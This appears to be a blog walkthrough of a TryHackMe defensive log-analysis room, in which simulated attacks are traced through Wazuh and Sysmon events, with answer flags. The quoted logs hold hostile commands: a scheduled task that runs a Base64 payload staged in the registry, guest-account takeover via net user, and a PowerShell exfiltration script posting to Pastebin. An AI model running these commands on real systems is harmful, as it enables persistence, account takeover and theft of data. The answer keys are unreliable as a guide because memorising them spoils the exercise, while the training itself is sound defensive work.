TryHackMe: Monday Monitor Walkthrough (SOC Level 1)

Welcome to this walkthrough of the Monday Monitor Room on TryHackMe. Swiftspend Finance, the coolest fintech company in town, is on a mission to level up its cyber security game to keep those digital adversaries at bay and ensure their customers stay safe and sound. Are you ready to test Swiftspend’s endpoint monitoring?

Monday Monitor Banner

Room URL:
https://tryhackme.com/room/mondaymonitor

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by these challenges on HTB and THM. Join me in learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.



Task 1: Navigate Through the Endpoint Logs

Scenario

Swiftspend Finance, the coolest fintech company in town, is on a mission to level up its cyber security game to keep those digital adversaries at bay and ensure their customers stay safe and sound.

Led by the tech-savvy Senior Security Engineer John Sterling, Swiftspend’s latest project is about beefing up their endpoint monitoring using Wazuh and Sysmon. They’ve been running some tests to see how well their cyber guardians can sniff out trouble. And guess what? You’re the cyber sleuth they’ve called in to crack the code!

The tests were run on Apr 29, 2024, between 12:00:00 and 20:00:00. As you dive into the logs, you’ll look for any suspicious process shenanigans or weird network connections, you name it! Your mission? Unravel the mysteries within the logs and dish out some epic insights to fine-tune Swiftspend’s defences.

Questions

Click the Start Machine button attached to this task to start the VM. Give the machine about 5 minutes to fully set up the environment. Access the Wazuh Dashboard using your browser at https://10-10-77-225.p.thmlabs.com and use the credentials listed in the room.

Once logged in, navigate to the Security events module and use the saved query Monday_Monitor to access the logs.

Initial access was established using a downloaded file. What is the file name saved on the host?

Go to Security Events underneath Modules in the menu.

And BTW, I was very confused seeing Wazuh like this, as we looked at a more modern version in the previous module.

Load the Monday_Monitor file by pressing the Load Button:

Make sure you filter the date on Apr 29, 2024, between 12:00:00 and 20:00:00. You can do this on the top-right side.

So, we got a bunch of events. But we need to find a needle in a haystack. Now, we didn’t really learn this in any rooms so far, as we didn’t cover Elastic/Kibana yet. But we know that the question mentions a downloaded file. This means we can filter on HTTP, just as we would do in, for example, Wireshark. We find 3 events, but one of them is a suspicious event:

Wazuh downloaded file event

The event data is here:

{
  "agent": {
    "ip": "10.10.205.57",
    "name": "Windows_SwiftSpend2",
    "id": "003"
  },
  "manager": {
    "name": "ip-10-10-40-198"
  },
  "data": {
    "win": {
      "eventdata": {
        "originalFileName": "PowerShell.EXE",
        "image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe",
        "product": "Microsoft® Windows® Operating System",
        "parentProcessGuid": "{00000000-0000-0000-0000-000000000000}",
        "description": "Windows PowerShell",
        "logonGuid": "{c5d2b969-8a47-662f-8b54-0a0000000000}",
        "processGuid": "{c5d2b969-a6d7-662f-3402-000000002201}",
        "logonId": "0xa548b",
        "parentProcessId": "2980",
        "processId": "6088",
        "currentDirectory": "C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\",
        "utcTime": "2024-04-29 13:55:35.417",
        "hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
        "company": "Microsoft Corporation",
        "commandLine": "\\\"powershell.exe\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\SwiftSpend_Financial_Expenses.xlsm}",
        "integrityLevel": "High",
        "fileVersion": "10.0.17763.1 (WinBuild.160101.0800)",
        "user": "ATOMIC\\\\Administrator",
        "terminalSessionId": "2"
      },
      "system": {
        "eventID": "1",
        "keywords": "0x8000000000000000",
        "providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "level": "4",
        "channel": "Microsoft-Windows-Sysmon/Operational",
        "opcode": "0",
        "message": "\"Process Create:\r\nRuleName: -\r\nUtcTime: 2024-04-29 13:55:35.417\r\nProcessGuid: {c5d2b969-a6d7-662f-3402-000000002201}\r\nProcessId: 6088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.17763.1 (WinBuild.160101.0800)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" & {$url = 'http://localhost/PhishingAttachment.xlsm'\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\SwiftSpend_Financial_Expenses.xlsm}\r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: ATOMIC\\Administrator\r\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\r\nLogonId: 0xA548B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\r\nParentProcessGuid: {00000000-0000-0000-0000-000000000000}\r\nParentProcessId: 2980\r\nParentImage: -\r\nParentCommandLine: -\r\nParentUser: -\"",
        "version": "5",
        "systemTime": "2024-04-29T13:55:35.420054500Z",
        "eventRecordID": "5716",
        "threadID": "1760",
        "computer": "ATOMIC",
        "task": "1",
        "processID": "3492",
        "severityValue": "INFORMATION",
        "providerName": "Microsoft-Windows-Sysmon"
      }
    }
  },
  "rule": {
    "firedtimes": 6,
    "mail": true,
    "level": 12,
    "description": "Detects suspicious file execution by wscript and cscript",
    "groups": [
      "sysmon",
      "sysmon_process-anomalies"
    ],
    "id": "255042"
  },
  "decoder": {
    "name": "windows_eventchannel"
  },
  "full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2024-04-29T13:55:35.420054500Z\",\"eventRecordID\":\"5716\",\"processID\":\"3492\",\"threadID\":\"1760\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"ATOMIC\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: -\\r\\nUtcTime: 2024-04-29 13:55:35.417\\r\\nProcessGuid: {c5d2b969-a6d7-662f-3402-000000002201}\\r\\nProcessId: 6088\\r\\nImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nFileVersion: 10.0.17763.1 (WinBuild.160101.0800)\\r\\nDescription: Windows PowerShell\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: PowerShell.EXE\\r\\nCommandLine: \\\"powershell.exe\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm'\\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\SwiftSpend_Financial_Expenses.xlsm}\\r\\nCurrentDirectory: C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\\\r\\nUser: ATOMIC\\\\Administrator\\r\\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\\r\\nLogonId: 0xA548B\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\\r\\nParentProcessGuid: {00000000-0000-0000-0000-000000000000}\\r\\nParentProcessId: 2980\\r\\nParentImage: -\\r\\nParentCommandLine: -\\r\\nParentUser: -\\\"\"},\"eventdata\":{\"utcTime\":\"2024-04-29 13:55:35.417\",\"processGuid\":\"{c5d2b969-a6d7-662f-3402-000000002201}\",\"processId\":\"6088\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\",\"fileVersion\":\"10.0.17763.1 
(WinBuild.160101.0800)\",\"description\":\"Windows PowerShell\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"PowerShell.EXE\",\"commandLine\":\"\\\\\\\"powershell.exe\\\\\\\" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\\\\\\\SwiftSpend_Financial_Expenses.xlsm}\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\ADMINI~1\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\2\\\\\\\\\",\"user\":\"ATOMIC\\\\\\\\Administrator\",\"logonGuid\":\"{c5d2b969-8a47-662f-8b54-0a0000000000}\",\"logonId\":\"0xa548b\",\"terminalSessionId\":\"2\",\"integrityLevel\":\"High\",\"hashes\":\"MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F\",\"parentProcessGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"parentProcessId\":\"2980\"}}}",
  "input": {
    "type": "log"
  },
  "@timestamp": "2024-04-29T13:55:36.383Z",
  "location": "EventChannel",
  "id": "1714398936.2540312",
  "timestamp": "2024-04-29T13:55:36.383+0000",
  "_id": "TWUjKo8BB_AxyUDv1QrF"
}

This is a SYSMON Event with ID 1 (Event ID 1: Process Create):

    "task": "1",
    "processID": "3492",
    "severityValue": "INFORMATION",
    "providerName": "Microsoft-Windows-Sysmon"

Let’s look at the event in more detail:

A process was started on a host named ATOMIC, running under the user ATOMIC\Administrator, using a PowerShell command. Here’s the specific command:

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\SwiftSpend_Financial_Expenses.xlsm}

PowerShell was used to download a file, which is a common technique in phishing or malware delivery.

The file downloaded is named PhishingAttachment.xlsm, which strongly hints at a malicious macro-enabled Excel file.

The downloaded file is saved to the Temp folder with a legitimate-sounding name: SwiftSpend_Financial_Expenses.xlsm. This could be an attempt to trick users into opening it.

PS: If you have trouble finding the log entry, you can filter on rule.id: 255042. It has the “Detects suspicious file execution by wscript and cscript” description. Anyway, the file which is saved on the host is an Excel file called SwiftSpend_Financial_Expenses.xlsm.

Answer: SwiftSpend_Financial_Expenses.xlsm

What is the full command run to create a scheduled task?

OK. Here is what I did. I filtered all events on Schtasks.exe by using the search bar at the top. This reduced the number of events to 4.

Have a look at the first or third event:

Task scheduler event

Here you can find something interesting for the field data.win.eventdata.parentCommandLine. Let’s break the whole event down:

 "data": {
    "win": {
      "eventdata": {
        "originalFileName": "schtasks.exe",
        "image": "C:\\\\Windows\\\\System32\\\\schtasks.exe",
        "product": "Microsoft® Windows® Operating System",
        "parentProcessGuid": "{c5d2b969-aada-662f-6a02-000000002201}",
        "description": "Task Scheduler Configuration Tool",
        "logonGuid": "{c5d2b969-8a47-662f-8b54-0a0000000000}",
        "parentCommandLine": "\\\"cmd.exe\\\" /c \\\"reg add HKCU\\\\SOFTWARE\\\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \\\"ATOMIC-T1053.005\\\" /TR \\\"cmd /c start /min \\\\\\\"\\\\\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\\\\\SOFTWARE\\\\\\\\ATOMIC-T1053.005).test)))\\\" /sc daily /st 12:34\\\"",
        "processGuid": "{c5d2b969-aada-662f-6d02-000000002201}",
        "logonId": "0xa548b",
        "parentProcessId": "6520",
        "processId": "6280",
        "currentDirectory": "C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\",
        "utcTime": "2024-04-29 14:12:42.509",
        "hashes": "MD5=2F6CE97FAF2D5EEA919E4393BDD416A7,SHA256=4B679CCC4E0E84A9EDDC24362EA4A86835597A90D94A1AE0EA905D7BCD9F771C,IMPHASH=0BF09EE8918142EE8D325D5955AA1CD9",
        "parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
        "company": "Microsoft Corporation",
        "commandLine": "schtasks.exe  /Create /F /TN \\\"ATOMIC-T1053.005\\\" /TR \\\"cmd /c start /min \\\\\\\"\\\\\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\\\\\SOFTWARE\\\\\\\\ATOMIC-T1053.005).test)))\\\" /sc daily /st 12:34",
        "integrityLevel": "High",
        "fileVersion": "10.0.17763.1613 (WinBuild.160101.0800)",
        "user": "ATOMIC\\\\Administrator",
        "terminalSessionId": "2",
        "parentUser": "ATOMIC\\\\Administrator"
      },
      "system": {
        "eventID": "1",
        "keywords": "0x8000000000000000",
        "providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "level": "4",
        "channel": "Microsoft-Windows-Sysmon/Operational",
        "opcode": "0",
        "message": "\"Process Create:\r\nRuleName: -\r\nUtcTime: 2024-04-29 14:12:42.509\r\nProcessGuid: {c5d2b969-aada-662f-6d02-000000002201}\r\nProcessId: 6280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.17763.1613 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks.exe  /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: ATOMIC\\Administrator\r\nLogonGuid: {c5d2b969-8a47-662f-8b54-0a0000000000}\r\nLogonId: 0xA548B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: MD5=2F6CE97FAF2D5EEA919E4393BDD416A7,SHA256=4B679CCC4E0E84A9EDDC24362EA4A86835597A90D94A1AE0EA905D7BCD9F771C,IMPHASH=0BF09EE8918142EE8D325D5955AA1CD9\r\nParentProcessGuid: {c5d2b969-aada-662f-6a02-000000002201}\r\nParentProcessId: 6520\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\"\r\nParentUser: ATOMIC\\Administrator\"",
        "version": "5",
        "systemTime": "2024-04-29T14:12:42.509969700Z",
        "eventRecordID": "5773",
        "threadID": "2032",
        "computer": "ATOMIC",
        "task": "1",
        "processID": "6760",
        "severityValue": "INFORMATION",
        "providerName": "Microsoft-Windows-Sysmon"
      }
    }
  },

This is also a Windows Sysmon Event ID 1: Process Create, which logs the creation of a process, specifically a suspicious use of cmd.exe and schtasks.exe to set up a daily scheduled task that executes a PowerShell command stored in the Windows registry as Base64-encoded PowerShell.

How do I know it is a Sysmon Event ID 1? Because if you look at the event data you can see this:

<Provider Name="Microsoft-Windows-Sysmon" />
<EventID>1</EventID>

Step-by-step

Parent Process:
Powershell.exe is run with -ExecutionPolicy Bypass, allowing it to execute scripts without restrictions.

Child Process (Observed Event):

  • cmd.exe is launched.
  • It runs two commands combined with &:
    1. Adds a registry key: reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f
      This creates a registry value called test under HKCU\SOFTWARE\ATOMIC-T1053.005 with Base64 data:
      cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=, which decodes to: ping www.youarevulnerable.thm
    2. Creates a scheduled task: schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min "" powershell.exe -Command IEX(...)" /sc daily /st 12:34
      This sets a scheduled task that runs daily at 12:34.
      The task runs a minimized PowerShell command, which:
      – Reads the registry value
      – Decodes it from Base64.
      – Uses IEX (Invoke-Expression) to execute the decoded command: IEX([System.Text.Encoding]::ASCII.GetString( [System.Convert]::FromBase64String( (Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test ) ))
      Effectively: ping www.youarevulnerable.thm

This is suspicious because:

  • Technique: This mimics the MITRE ATT&CK technique T1053.005 – Scheduled Task/Job: Scheduled Task.
  • Persistence: The scheduled task allows persistent execution even after reboot.
  • Obfuscation: Using the registry to store and Base64-encode the payload hides the true intent from casual inspection.
  • Command: Although the decoded command here is a harmless ping, this is often used in Red Team testing or malware to simulate beaconing to a command-and-control server.

Anyway, the answer is found in the data.win.eventdata.parentCommandLine field.

Answer: "cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"

What time is the scheduled task meant to run?

Let’s look at the command again. You might have noticed the /sc flag, which sets the schedule frequency, and the /st flag, which sets the start time. In this case the task is run daily, at 12:34.

Answer: 12:34

What was encoded?

I covered this before. The base64 string (cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=) saved in the registry decodes to ping www.youarevulnerable.thm.

Answer: ping www.youarevulnerable.thm
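
The breakdown above and the two follow-up questions (start time, encoded payload) can be reproduced mechanically. The Python below is an added example, not part of the room or of the original walkthrough: it takes the parentCommandLine value, extracts the task name, schedule and start time, checks that the task action reads back the same registry value that reg add wrote, and decodes it. The function names are hypothetical.

```python
import base64
import binascii
import re

# parentCommandLine of the Sysmon Event ID 1 shown above, JSON escaping removed.
SAMPLE = (
    r'"cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ '
    r'/d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F '
    r'/TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command '
    r'IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::'
    r'FromBase64String((Get-ItemProperty -Path '
    r'HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"'
)


def _switch(args, name):
    """Return the value of a /NAME switch (quoted or bare), or None if absent."""
    m = re.search(rf'(?<!\S)/{name}\s+(?:"([^"]+)"|(\S+))', args, re.I)
    return (m.group(1) or m.group(2)).strip('"') if m else None


def _norm_key(path):
    """Make 'HKCU:' drive paths and 'HKCU' reg.exe paths comparable."""
    parts = path.replace(":", "").split("\\")
    return "\\".join(p for p in parts if p).upper()


def analyze(cmdline):
    """Summarise a schtasks /Create command line; None if it is not one."""
    task = re.search(r'\bschtasks(?:\.exe)?"?\s+/create\b(.*)', cmdline, re.I | re.S)
    if not task:
        return None
    args = task.group(1)
    out = {"task": _switch(args, "tn"), "schedule": _switch(args, "sc"),
           "start": _switch(args, "st"), "staged_in_registry": False,
           "decoded": None}
    # reg add <key> ... up to the '&' that chains the next command
    reg = re.search(r'\breg(?:\.exe)?"?\s+add\s+(\S+)([^&]*)', cmdline, re.I)
    # (Get-ItemProperty -Path <key>).<value> inside the task action
    read = re.search(r'Get-ItemProperty\s+-Path\s+([^)\s]+)\)\.(\w+)', args, re.I)
    if not reg:
        return out
    value, blob = _switch(reg.group(2), "v"), _switch(reg.group(2), "d")
    if read and value:
        out["staged_in_registry"] = (
            _norm_key(reg.group(1)) == _norm_key(read.group(1))
            and value.lower() == read.group(2).lower())
    if blob and "frombase64string" in args.lower():
        try:  # validate=True rejects data that is not clean Base64
            raw = base64.b64decode(blob, validate=True)
            out["decoded"] = raw.decode("ascii", errors="replace")
        except (binascii.Error, ValueError):
            pass
    return out


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

A scheduled task whose action runs a plain executable returns staged_in_registry False and decoded None, which makes the registry-staged variant easy to separate during triage.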

What password was set for the new user account?

I started googling around to see which Event IDs were relevant here. This led me to eventID 4738.

Here I found two events related to the Guest Account. The events (for good reason) do not mention a password though. So I removed the filter, and started looking around the timestamp during which these two events triggered, so that I can find other relevant events.

Directly before the first of these events we see the following event:

Here the guest account is being activated:

net1 user guest /active:yes

Before moving on, I would recommend adding the data.win.eventdata.commandLine field to the table view. This makes it much easier to see what is going on! It immediately becomes clear that suspicious stuff is going on:

Suspicious events

In addition to events adding the Guest account to the Administrators group (bad idea!), there are also two events which change the guest account password using net.exe:

net.exe\" user guest I_AM_M0NIT0R1NG

net1 user guest I_AM_M0NIT0R1NG

Answer: I_AM_M0NIT0R1NG
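
The pivot used above (start from Event ID 4738, then read the process-creation events logged around it) can be scripted over exported alerts. This is an added example, not part of the room or of the original walkthrough; the function names are hypothetical, and the alert timestamps, the helpdesk account and the net localgroup command line are constructed sample values.

```python
import re
from datetime import datetime, timedelta

NET_USER = re.compile(r'\bnet1?(?:\.exe)?"?\s+user\s+(\S+)\s*(\S*)', re.I)
NET_GROUP = re.compile(r'\bnet1?(?:\.exe)?"?\s+localgroup\s+(\S+)\s+(\S+)\s+/add', re.I)

def classify(cmd):
    """Map a net/net1 command line to (action, account, detail), else None."""
    m = NET_GROUP.search(cmd)
    if m:
        return ("group_add", m.group(2).lower(), m.group(1).lower())
    m = NET_USER.search(cmd)
    if not m:
        return None
    user, arg = m.group(1).lower(), m.group(2)
    if arg.lower() == "/active:yes":
        return ("account_enabled", user, "")
    if arg and not arg.startswith("/"):
        return ("password_on_cmdline", user, arg)  # positional argument = new password
    return None

def _get(alert, *path):
    for key in path:
        alert = alert.get(key) if isinstance(alert, dict) else None
    return alert

def _when(alert):
    return datetime.strptime(alert["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")

def pivot(alerts, anchor_id="4738", window=timedelta(seconds=30)):
    """Classify Sysmon process creations logged within `window` of an anchor event."""
    anchors = [_when(a) for a in alerts
               if _get(a, "data", "win", "system", "eventID") == anchor_id]
    findings = {}  # dict keeps first-seen order and drops the net.exe/net1 duplicate
    for a in sorted(alerts, key=_when):
        cmd = _get(a, "data", "win", "eventdata", "commandLine")
        if _get(a, "data", "win", "system", "eventID") != "1" or not cmd:
            continue
        if any(abs(_when(a) - t) <= window for t in anchors) and classify(cmd):
            findings[classify(cmd)] = True
    return list(findings)

def _alert(ts, event_id, cmd=None):
    # Constructed alert in the Wazuh field layout shown on this page.
    return {"timestamp": f"2024-04-29T{ts}.000+0000",
            "data": {"win": {"system": {"eventID": event_id},
                             "eventdata": {"commandLine": cmd} if cmd else {}}}}

# Constructed timeline: times, the helpdesk account and the localgroup command are
# sample values; the guest commands are the ones quoted in the walkthrough.
ALERTS = [
    _alert("12:30:00", "1", "net user helpdesk /active:yes"),  # far from any anchor
    _alert("15:10:00", "1", "net1 user guest /active:yes"),
    _alert("15:10:01", "4738"),
    _alert("15:10:05", "1", 'net.exe" user guest I_AM_M0NIT0R1NG'),
    _alert("15:10:05", "1", "net1 user guest I_AM_M0NIT0R1NG"),
    _alert("15:10:09", "4738"),
    _alert("15:10:12", "1", "net localgroup administrators guest /add"),
]

if __name__ == "__main__":
    for finding in pivot(ALERTS):
        print(finding)
```

The 4738 events themselves carry no password, so the finding comes entirely from the Sysmon command lines inside the window.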

What is the name of the .exe that was used to dump credentials?

Scroll roughly 10-11 events down and you will come across some relevant events:

Dumping credentials

These appear to be two different credential-dumping commands and are part of an Atomic Red Team technique (T1003.001), which is a simulated attack procedure for dumping credentials from a Windows machine, particularly from the LSASS (Local Security Authority Subsystem Service) process.

Anyway, the answer is memotech.exe.

Answer: memotech.exe

Data was exfiltrated from the host. What was the flag that was part of the data?

Keep scrolling down and you will come across the data exfiltration part:

Powershell command with flag
\"powershell.exe\" & {$apiKey = \\\"\"6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0\\\"\" $content = \\\"\"secrets, api keys, passwords, THM{M0N1T0R_1$_1N_3FF3CT}, confidential, private, wall, redeem...\\\"\" $url = \\\"\"https://pastebin.com/api/api_post.php\\\"\" $postData = @{   api_dev_key   = $apiKey   api_option    = \\\"\"paste\\\"\"   api_paste_code = $content } $response = Invoke-RestMethod -Uri $url -Method Post -Body $postData Write-Host \\\"\"Your paste URL: $response\\\"\"}

Here you can see a REST call getting made, which includes a flag in its content.

Answer: THM{M0N1T0R_1$_1N_3FF3CT}


Congratulations on completing Monday Monitor!!!


Congratulations on completing Monday Monitor. Uff, I honestly thought this was a tough one! The previous Wazuh room did not completely prepare us for this question, and I felt like I was unsure if I was following the most efficient route to the answers. I would love to discuss this room with others, so please leave comments!

Come back soon for more walkthroughs of rooms on TryHackMe and HackTheBox, and other Cybersecurity discussions.
